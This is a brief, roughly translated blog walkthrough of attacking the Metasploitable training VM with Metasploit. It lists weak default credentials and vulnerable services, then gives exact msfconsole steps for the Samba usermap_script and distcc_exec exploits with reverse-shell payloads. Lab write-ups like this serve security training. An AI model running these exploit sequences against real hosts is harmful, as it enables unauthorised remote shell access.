Shulou(Shulou.com)06/01 Report--

Vulnerability testing is indeed possible. At that time, copy the article down and test it again. But without copy to the picture, the experiment is successful, but not so intuitive.

Use metasploit

Perform * on the metasploitable target server

Metasploitable is the version of ubuntu8.0

Port 139 can get the hostname of the system as "METASPLOITABLE" and the comment "metasploitable server (Samba 3.0.20-Debian)"

There is a weak password in the system, and the user's user and msfadmin passwords are the same as the user name, and the net use command can be used to establish a connection to view the shared resources. Ftp Open version Information ProFTPD 1.3.1 Server (Debian), user is also available in ftp

The telnet service is open, and the system can be determined as Ubuntu 8.04. users user and msfadmin can log in and get the corresponding permissions. If there is no weak password, the user password can also be obtained by intercepting the telnet data.

A distcc vulnerability

Tools for msf to target server

Smb-samba shared service

Use exploit/multi/samba/usermap_script

Set payload cmd/unix/reverse

Set rhost (ip address)

Set lhost (ip address)

Exploit

Use exploit/unix/misc/distcc_exec

Set payload cmd/unix/reverse_perl

Set rhost (ip address)

Set lhost (ip address)

Exploit

Distcc succeeded but does not have permission for root

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.